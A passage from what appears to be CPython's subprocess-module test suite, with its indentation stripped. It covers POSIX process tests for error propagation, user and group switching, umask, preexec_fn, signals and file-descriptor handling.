after_secs = time.monotonic()
stacks = traceback.format_exc() # assertRaises doesn't give this.
else:
self.fail("TimeoutExpired not raised.")
self.assertLess(after_secs - before_secs, 1.5,
msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
f"{stacks}```")
def _get_test_grp_name():
for name_group in ('staff', 'nogroup', 'grp', 'nobody', 'nfsnobody'):
if grp:
try:
grp.getgrnam(name_group)
except KeyError:
continue
return name_group
else:
raise unittest.SkipTest('No identified group name to use for this test on this platform.')
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
@unittest.skipUnless(hasattr(os, 'setreuid'), 'no setreuid on platform')
def test_user(self):
# For code coverage of the user parameter. We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
uid = os.geteuid()
test_users = [65534 if uid != 65534 else 65533, uid]
name_uid = "nobody" if sys.platform != 'darwin' else "unknown"
if pwd is not None:
try:
pwd.getpwnam(name_uid)
test_users.append(name_uid)
except KeyError:
# unknown user name
name_uid = None
for user in test_users:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(user=user, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getuid())"],
user=user,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
except OSError as e:
if e.errno not in (errno.EACCES, errno.EPERM):
raise
else:
if isinstance(user, str):
user_uid = pwd.getpwnam(user).pw_uid
else:
user_uid = user
child_user = int(output)
self.assertEqual(child_user, user_uid)
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=-1)
with self.assertRaises(OverflowError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ, user=2**64)
if pwd is None and name_uid is not None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=name_uid)
@unittest.skipIf(hasattr(os, 'setreuid'), 'setreuid() available on platform')
def test_user_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=65535)
@unittest.skipUnless(hasattr(os, 'setregid'), 'no setregid() on platform')
def test_group(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
if grp is not None:
group_list.append(name_group)
for group in group_list + [gid]:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(group=group, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getgid())"],
group=group,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
else:
if isinstance(group, str):
group_gid = grp.getgrnam(group).gr_gid
else:
group_gid = group
child_group = int(output)
self.assertEqual(child_group, group_gid)
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=-1)
with self.assertRaises(OverflowError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ, group=2**64)
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=name_group)
@unittest.skipIf(hasattr(os, 'setregid'), 'setregid() available on platform')
def test_group_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=65535)
@unittest.skipUnless(hasattr(os, 'setgroups'), 'no setgroups() on platform')
def test_extra_groups(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
perm_error = False
if grp is not None:
group_list.append(name_group)
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os, sys, json; json.dump(os.getgroups(), sys.stdout)"],
extra_groups=group_list)
except OSError as ex:
if ex.errno != errno.EPERM:
raise
perm_error = True
else:
parent_groups = os.getgroups()
child_groups = json.loads(output)
if grp is not None:
desired_gids = [grp.getgrnam(g).gr_gid if isinstance(g, str) else g
for g in group_list]
else:
desired_gids = group_list
if perm_error:
self.assertEqual(set(child_groups), set(parent_groups))
else:
self.assertEqual(set(desired_gids), set(child_groups))
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[-1])
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ,
extra_groups=[2**64])
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
extra_groups=[name_group])
@unittest.skipIf(hasattr(os, 'setgroups'), 'setgroups() available on platform')
def test_extra_groups_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[])
@unittest.skipIf(mswindows or not hasattr(os, 'umask'),
'POSIX umask() is not available.')
def test_umask(self):
tmpdir = None
try:
tmpdir = tempfile.mkdtemp()
name = os.path.join(tmpdir, "beans")
# We set an unusual umask in the child so as a unique mode
# for us to test the child's touched file for.
subprocess.check_call(
[sys.executable, "-c", f"open({name!r}, 'w').close()"],
umask=0o053)
# Ignore execute permissions entirely in our test,
# filesystems could be mounted to ignore or force that.
st_mode = os.stat(name).st_mode & 0o666
expected_mode = 0o624
self.assertEqual(expected_mode, st_mode,
msg=f'{oct(expected_mode)} != {oct(st_mode)}')
finally:
if tmpdir is not None:
shutil.rmtree(tmpdir)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
self.assertEqual(out, b'apple')
self.assertEqual(err, b'orange')
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = os.read(temp_fds[0], 1024).strip()
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = os.read(stderr_no, 1024).strip()
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
ZERO_RETURN_CMD,
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(ZERO_RETURN_CMD[0])
args = list(ZERO_RETURN_CMD[1:])
path, program = os.path.split(ZERO_RETURN_CMD[0])
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program]+args)
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program]+args, env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program]+args, env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
